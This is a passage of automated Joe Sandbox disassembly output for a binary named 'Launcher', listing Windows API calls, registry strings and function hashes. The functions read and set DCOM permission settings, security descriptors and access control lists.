                                                                                                                  • Part of subcall function 00B6D2F7: wsprintfW.USER32 ref: 00B6D35B
                                                                                                                  • Part of subcall function 00B6D2F7: lstrcatW.KERNEL32(?,00B560AC), ref: 00B6D376
                                                                                                                  • Part of subcall function 00B6D2F7: lstrcatW.KERNEL32(?,?), ref: 00B6D37E
                                                                                                                  • Part of subcall function 00B6C0BC: __EH_prolog3_GS.LIBCMT ref: 00B6C0C6
                                                                                                                  • Part of subcall function 00B6C0BC: #540.MFC42U(00000488,00B5C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00B6C0F1
                                                                                                                  • Part of subcall function 00B6C0BC: RegOpenKeyExW.ADVAPI32 ref: 00B6C112
                                                                                                                  • Part of subcall function 00B6C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6C13A
                                                                                                                  • Part of subcall function 00B6C0BC: RegCloseKey.ADVAPI32(?), ref: 00B6C151
                                                                                                                  • Part of subcall function 00B6C0BC: #800.MFC42U ref: 00B6C15F
                                                                                                                • #2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00B60C33
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B60C46
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B60C57
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B60C6F
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B60C80
                                                                                                                • UpdateWindow.USER32(?), ref: 00B60C8C
                                                                                                                • #2634.MFC42U(00000001), ref: 00B60C9A
                                                                                                                • #2634.MFC42U(00000001,00000001), ref: 00B60CA3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2634$lstrcat$#540#800CloseH_prolog3_OpenQueryUpdateValueWindowwsprintf
                                                                                                                • String ID: LaunchPermission
                                                                                                                • API String ID: 2454494747-4257139491
                                                                                                                • Opcode ID: 0743cc5e070bf41d074f7b2c8057268750274aafff36cf429e1e96e159a8d0d2
                                                                                                                • Instruction ID: ed41e823448610875f49d2a82f06dde24e45c4558f0704f3d4d114603106bfe4
                                                                                                                • Opcode Fuzzy Hash: 0743cc5e070bf41d074f7b2c8057268750274aafff36cf429e1e96e159a8d0d2
                                                                                                                • Instruction Fuzzy Hash: 17214131640214ABEB25AF21CC4AFE63BA9DF46741F4500B4FE096E1D6CFB25D85D7A0
                                                                                                                APIs
                                                                                                                • #4704.MFC42U ref: 00B5E81D
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00B5E848
                                                                                                                • SendMessageW.USER32(?,00001061,00000001,?), ref: 00B5E86C
                                                                                                                • #1662.MFC42U ref: 00B5E874
                                                                                                                  • Part of subcall function 00B6C0BC: __EH_prolog3_GS.LIBCMT ref: 00B6C0C6
                                                                                                                  • Part of subcall function 00B6C0BC: #540.MFC42U(00000488,00B5C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00B6C0F1
                                                                                                                  • Part of subcall function 00B6C0BC: RegOpenKeyExW.ADVAPI32 ref: 00B6C112
                                                                                                                  • Part of subcall function 00B6C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6C13A
                                                                                                                  • Part of subcall function 00B6C0BC: RegCloseKey.ADVAPI32(?), ref: 00B6C151
                                                                                                                  • Part of subcall function 00B6C0BC: #800.MFC42U ref: 00B6C15F
                                                                                                                • #2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTACCESSPERMISSION), ref: 00B5E896
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
                                                                                                                • String ID: Can Access$DEFAULTACCESSPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
                                                                                                                • API String ID: 3233431167-2986021116
                                                                                                                • Opcode ID: 4e2b1ea830e81a649a1c9796e3041504aca4f36a8a5271d41af38601cb2144f8
                                                                                                                • Instruction ID: ececa96ab328195b67b33157cb7a58a0c4b09b313b5470668aea88b27db41be2
                                                                                                                • Opcode Fuzzy Hash: 4e2b1ea830e81a649a1c9796e3041504aca4f36a8a5271d41af38601cb2144f8
                                                                                                                • Instruction Fuzzy Hash: 91018475500308ABEB14ABB0CC46FEF7BF9EB45714F00045DF91176280CB7999458BA5
                                                                                                                APIs
                                                                                                                • #4704.MFC42U ref: 00B5EA0D
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00B5EA38
                                                                                                                • SendMessageW.USER32(?,00001061,00000001,?), ref: 00B5EA5C
                                                                                                                • #1662.MFC42U ref: 00B5EA64
                                                                                                                  • Part of subcall function 00B6C0BC: __EH_prolog3_GS.LIBCMT ref: 00B6C0C6
                                                                                                                  • Part of subcall function 00B6C0BC: #540.MFC42U(00000488,00B5C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00B6C0F1
                                                                                                                  • Part of subcall function 00B6C0BC: RegOpenKeyExW.ADVAPI32 ref: 00B6C112
                                                                                                                  • Part of subcall function 00B6C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6C13A
                                                                                                                  • Part of subcall function 00B6C0BC: RegCloseKey.ADVAPI32(?), ref: 00B6C151
                                                                                                                  • Part of subcall function 00B6C0BC: #800.MFC42U ref: 00B6C15F
                                                                                                                • #2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTLAUNCHPERMISSION), ref: 00B5EA86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
                                                                                                                • String ID: Can Launch$DEFAULTLAUNCHPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
                                                                                                                • API String ID: 3233431167-4187468794
                                                                                                                • Opcode ID: f0a412751aaa89a6b30f4d2d2a265542289a8dcc37bb4525c60813d078199328
                                                                                                                • Instruction ID: 9f8de1c7b47b01ef72fe6c328f521bd55e246ece3bfbcf904a6c619a87074956
                                                                                                                • Opcode Fuzzy Hash: f0a412751aaa89a6b30f4d2d2a265542289a8dcc37bb4525c60813d078199328
                                                                                                                • Instruction Fuzzy Hash: 46018475500308ABEB14ABA0CC46FEF7BF9EB85B14F00045DF91176380CB7999458BA5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B6B37C: __EH_prolog3.LIBCMT ref: 00B6B383
                                                                                                                  • Part of subcall function 00B6B37C: #324.MFC42U(00000083,?,00000004,00B62D50,?,F6B930CF), ref: 00B6B395
                                                                                                                  • Part of subcall function 00B6B37C: #540.MFC42U(00000083,?,00000004,00B62D50,?,F6B930CF), ref: 00B6B3A7
                                                                                                                  • Part of subcall function 00B6B37C: #861.MFC42U(00B521A0,00000083,?,00000004,00B62D50,?,F6B930CF), ref: 00B6B3B8
                                                                                                                • #858.MFC42U(?,?,F6B930CF), ref: 00B62D5E
                                                                                                                • #2506.MFC42U(?,?,F6B930CF), ref: 00B62D69
                                                                                                                • #800.MFC42U(?,?,F6B930CF), ref: 00B62D7A
                                                                                                                • #641.MFC42U(?,?,F6B930CF), ref: 00B62D85
                                                                                                                • #858.MFC42U(?,?,?,F6B930CF), ref: 00B62D99
                                                                                                                • #2910.MFC42U(00000104,?,?,?,F6B930CF), ref: 00B62DB2
                                                                                                                • #5568.MFC42U(000000FF,00000104,?,?,?,F6B930CF), ref: 00B62E4F
                                                                                                                • #800.MFC42U(000000FF,00000104,?,?,?,F6B930CF), ref: 00B62E61
                                                                                                                • #641.MFC42U(000000FF,00000104,?,?,?,F6B930CF), ref: 00B62E6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #641#800#858$#2506#2910#324#540#5568#861H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 1871001060-0
                                                                                                                • Opcode ID: cfb08008bd6b9bb60fe86271066c8678615525f83ff47ed45a69966b8892b686
                                                                                                                • Instruction ID: 15c379fe6f50f227600e0cfef7f926d550346db952bafc9f11a50938f2b7b413
                                                                                                                • Opcode Fuzzy Hash: cfb08008bd6b9bb60fe86271066c8678615525f83ff47ed45a69966b8892b686
                                                                                                                • Instruction Fuzzy Hash: 67512771D00609DBDF14EBA8C896BEEB7F5FF04314F2045A9E022AB2E1DB395A45CB51
                                                                                                                APIs
                                                                                                                • SetSecurityDescriptorGroup.ADVAPI32(00000000,00000000,?,00000000,?,00B6CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CE90
                                                                                                                • GetLastError.KERNEL32(?,00B6CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CE9A
                                                                                                                • free.MSVCRT ref: 00B6CEBE
                                                                                                                • IsValidSid.ADVAPI32(00000000,00000000,?,?,00B6CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CED7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DescriptorErrorGroupLastSecurityValidfree
                                                                                                                • String ID:
                                                                                                                • API String ID: 3125347566-0
                                                                                                                • Opcode ID: 23e0b9fd1301f3eea822939a34f2bccf0506787c2956610fc89a59caa77769cd
                                                                                                                • Instruction ID: 7c7408796bb362e102cf800c448736da9940efc61c7efc0fc022aa526b3e7a57
                                                                                                                • Opcode Fuzzy Hash: 23e0b9fd1301f3eea822939a34f2bccf0506787c2956610fc89a59caa77769cd
                                                                                                                • Instruction Fuzzy Hash: 8B218032204112EBD7111B62EC48B76BFE9FB00B66F218166F959DB160DB3DDC949BA0
                                                                                                                APIs
                                                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,00000000,?,00000000,?,00B6CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CF7B
                                                                                                                • GetLastError.KERNEL32(?,00B6CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CF85
                                                                                                                • free.MSVCRT ref: 00B6CFA9
                                                                                                                • IsValidSid.ADVAPI32(00000000,00000000,?,?,00B6CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CFC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DescriptorErrorLastOwnerSecurityValidfree
                                                                                                                • String ID:
                                                                                                                • API String ID: 2895241793-0
                                                                                                                • Opcode ID: 623914edc856f0c1a27a4cd7e18ac84bfabc98ada746db81c1235c0b2c838fbf
                                                                                                                • Instruction ID: 4de4af5e9e9492d974ce48f521e8b6c99cee37edca11bbea7a1081e11fcdf3d1
                                                                                                                • Opcode Fuzzy Hash: 623914edc856f0c1a27a4cd7e18ac84bfabc98ada746db81c1235c0b2c838fbf
                                                                                                                • Instruction Fuzzy Hash: 5B21BE32704122EBD7211B61DD08B76BBE8FF00366F218166F909DB160EB3DDC51DAA4
                                                                                                                APIs
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,Interface,00000000), ref: 00B669E0
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00B66A19
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,?,?,00000200), ref: 00B66A4C
                                                                                                                • wsprintfW.USER32 ref: 00B66A7F
                                                                                                                • CLSIDFromString.OLE32(00000000,-00000008), ref: 00B66B21
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B66C0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumFromOpenQueryStringValuewsprintf
                                                                                                                • String ID: %s <no name>$'$Interface
                                                                                                                • API String ID: 4261639067-2844714346
                                                                                                                • Opcode ID: b8b36145d8fa4d36777145b22375d705dcf56669ff0f59f2dfd8ccf5b19d211b
                                                                                                                • Instruction ID: d84d71808f486eae273435e7c030da09567ef5f6df27b4e206efbf4f4df71751
                                                                                                                • Opcode Fuzzy Hash: b8b36145d8fa4d36777145b22375d705dcf56669ff0f59f2dfd8ccf5b19d211b
                                                                                                                • Instruction Fuzzy Hash: 5F81BD719012299FDB61DF64CD99BADB7F8FB08305F1041EAE809A72A1DB749E84CF40
                                                                                                                APIs
                                                                                                                • #6330.MFC42U(00000001), ref: 00B5CD9C
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B5CE3D
                                                                                                                • lstrcpyW.KERNEL32(?,Interactive User,?,?,00B521A0,RemoteServerName,00000001), ref: 00B5CE53
                                                                                                                • #3870.MFC42U(?,000000FF,?,?,00B521A0,RemoteServerName,00000001), ref: 00B5CE67
                                                                                                                • lstrlenW.KERNEL32(?,?,000000FF,?,?,00B521A0,RemoteServerName,00000001), ref: 00B5CE73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3870#6330MessageSendlstrcpylstrlen
                                                                                                                • String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
                                                                                                                • API String ID: 952077393-4117267133
                                                                                                                • Opcode ID: 6c96639cebf4cf864d64dcba044c1da74aeff6bccdd7b3bb100e8b7e500798f6
                                                                                                                • Instruction ID: 33dceefbffb290478803d39b3399e83d83c7166c8f478cb2a5e12287eee5d70c
                                                                                                                • Opcode Fuzzy Hash: 6c96639cebf4cf864d64dcba044c1da74aeff6bccdd7b3bb100e8b7e500798f6
                                                                                                                • Instruction Fuzzy Hash: 52319231A40705AAE711FF34CD87B673BEA9F06B02F4400E4BD10AF092DBB1AD084691
                                                                                                                APIs
                                                                                                                • #4704.MFC42U ref: 00B6B59A
                                                                                                                  • Part of subcall function 00B6D6F5: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,00B6D6E4,80000000,?,?,?,?,?), ref: 00B6D70D
                                                                                                                  • Part of subcall function 00B6D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00B6D6E4,?,?,?,00B6D6E4,80000000,?,?,?,?,?), ref: 00B6D72C
                                                                                                                  • Part of subcall function 00B6D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00B6D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00B6D738
                                                                                                                • lstrcmpiW.KERNEL32(?,00B52778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 00B6B5DB
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B6B5FC
                                                                                                                • lstrcmpiW.KERNEL32(?,00B52778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100), ref: 00B6B63D
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B6B655
                                                                                                                • #2634.MFC42U(00000000), ref: 00B6B664
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendlstrcmpi$#2634#4704CloseOpenQueryValue
                                                                                                                • String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE
                                                                                                                • API String ID: 3026051211-444212459
                                                                                                                • Opcode ID: c322c95a6dea1e995cd2185395b9c10033cdf40bafc297f2923036f674b60bbf
                                                                                                                • Instruction ID: 6c095840a07b655bcb29594ef886b99a0bc94a882c46d8726613ab3af5fb5205
                                                                                                                • Opcode Fuzzy Hash: c322c95a6dea1e995cd2185395b9c10033cdf40bafc297f2923036f674b60bbf
                                                                                                                • Instruction Fuzzy Hash: 11216271600219BAD724AB71CC49FE7BBFDEB05755F0001E5F919E2062EB749E88DA90
                                                                                                                APIs
                                                                                                                • GetAclInformation.ADVAPI32(00000000,00B6BA07,0000000C,00000002,00000000,0000000C,?,?,00B6BA07), ref: 00B6C64E
                                                                                                                • GetLastError.KERNEL32(?,00B6BA07), ref: 00B6C658
                                                                                                                • GetLengthSid.ADVAPI32(00000000,00000001,00000000,0000000C,?,?,00B6BA07), ref: 00B6C675
                                                                                                                • malloc.MSVCRT ref: 00B6C687
                                                                                                                • InitializeAcl.ADVAPI32(00000000,00000002,00000002,00B6BA07), ref: 00B6C6A1
                                                                                                                • AddAccessAllowedAce.ADVAPI32(00000000,00000002,00000000,00000000), ref: 00B6C6B2
                                                                                                                • GetLastError.KERNEL32 ref: 00B6C6BC
                                                                                                                • free.MSVCRT ref: 00B6C6D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AccessAllowedInformationInitializeLengthfreemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 86704185-0
                                                                                                                • Opcode ID: 7ec1f4e09d94660bc5a284c6549571938480d398db9750b5d11214205ae4ae01
                                                                                                                • Instruction ID: f3bd8816888e363c64fc2761d5608545f6fe45d74afb08593fe646e68689c444
                                                                                                                • Opcode Fuzzy Hash: 7ec1f4e09d94660bc5a284c6549571938480d398db9750b5d11214205ae4ae01
                                                                                                                • Instruction Fuzzy Hash: 6A31AE71600206EBC7119F69DC88BBE7BE8EB45712F214059F94AE7240DB38CD418BA9
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5EFEA
                                                                                                                • #540.MFC42U(000000F8), ref: 00B5EFF7
                                                                                                                  • Part of subcall function 00B5CF40: __EH_prolog3.LIBCMT ref: 00B5CF47
                                                                                                                  • Part of subcall function 00B5CF40: #324.MFC42U(00000092,?,00000008), ref: 00B5CF59
                                                                                                                  • Part of subcall function 00B5CF40: #567.MFC42U(00000092,?,00000008), ref: 00B5CF73
                                                                                                                • #3871.MFC42U(?,000000F8), ref: 00B5F01F
                                                                                                                • lstrcpyW.KERNEL32(?,?,?,000000F8), ref: 00B5F031
                                                                                                                • #2506.MFC42U ref: 00B5F03D
                                                                                                                • #6195.MFC42U(?), ref: 00B5F050
                                                                                                                • #6330.MFC42U(00000000), ref: 00B5F059
                                                                                                                • #693.MFC42U(00000000), ref: 00B5F061
                                                                                                                • #641.MFC42U(00000000), ref: 00B5F06C
                                                                                                                • #800.MFC42U(00000000), ref: 00B5F077
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2506#324#3871#540#567#6195#6330#641#693#800H_prolog3H_prolog3_lstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 768229929-0
                                                                                                                • Opcode ID: 3e0f766a11643107d98697ae323f3d340332c49a85ab6fd68ddbe6c4d9e46562
                                                                                                                • Instruction ID: 0106435e213b63c5d778414adfb92b6d0e359cc5e0c2977e89714919d4a7f839
                                                                                                                • Opcode Fuzzy Hash: 3e0f766a11643107d98697ae323f3d340332c49a85ab6fd68ddbe6c4d9e46562
                                                                                                                • Instruction Fuzzy Hash: AD012175A101199BCF25FB60CC96BEDB3B9AF65300F8000E9E15967181DFB86F88CB52
                                                                                                                APIs
                                                                                                                • #800.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F47D
                                                                                                                • #800.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F488
                                                                                                                • #800.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F493
                                                                                                                • #800.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F49E
                                                                                                                • #616.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4A9
                                                                                                                • #656.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4B4
                                                                                                                • #609.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4BF
                                                                                                                • #609.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4CA
                                                                                                                • #804.MFC42U(?,00B5D805,?,00B5D83D), ref: 00B5F4D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#609$#616#656#804
                                                                                                                • String ID:
                                                                                                                • API String ID: 3383334730-0
                                                                                                                • Opcode ID: e2765c4ac9e366dba0a75bc72b82e30ebe75625d3ce43d3293dd7851e9fca7cb
                                                                                                                • Instruction ID: 934c77da4eeec9bf77f54774721f4c97c93ed9f0ba76d507284be556ee27df59
                                                                                                                • Opcode Fuzzy Hash: e2765c4ac9e366dba0a75bc72b82e30ebe75625d3ce43d3293dd7851e9fca7cb
                                                                                                                • Instruction Fuzzy Hash: 1CF0FE35550611CBC639FB30D592AEAB7E1BF21300F4009BDB0AB03192AF357B09CB00
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00B5C722
                                                                                                                  • Part of subcall function 00B6D2F7: wsprintfW.USER32 ref: 00B6D35B
                                                                                                                  • Part of subcall function 00B6D2F7: lstrcatW.KERNEL32(?,00B560AC), ref: 00B6D376
                                                                                                                  • Part of subcall function 00B6D2F7: lstrcatW.KERNEL32(?,?), ref: 00B6D37E
                                                                                                                  • Part of subcall function 00B6C0BC: __EH_prolog3_GS.LIBCMT ref: 00B6C0C6
                                                                                                                  • Part of subcall function 00B6C0BC: #540.MFC42U(00000488,00B5C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00B6C0F1
                                                                                                                  • Part of subcall function 00B6C0BC: RegOpenKeyExW.ADVAPI32 ref: 00B6C112
                                                                                                                  • Part of subcall function 00B6C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6C13A
                                                                                                                  • Part of subcall function 00B6C0BC: RegCloseKey.ADVAPI32(?), ref: 00B6C151
                                                                                                                  • Part of subcall function 00B6C0BC: #800.MFC42U ref: 00B6C15F
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B5C78D
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B5C79D
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B5C7A9
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B5C7B8
                                                                                                                • #2634.MFC42U(00000001,?,?,?,?), ref: 00B5C7C8
                                                                                                                • #2634.MFC42U(00000001,00000001,?,?,?,?), ref: 00B5C7D4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
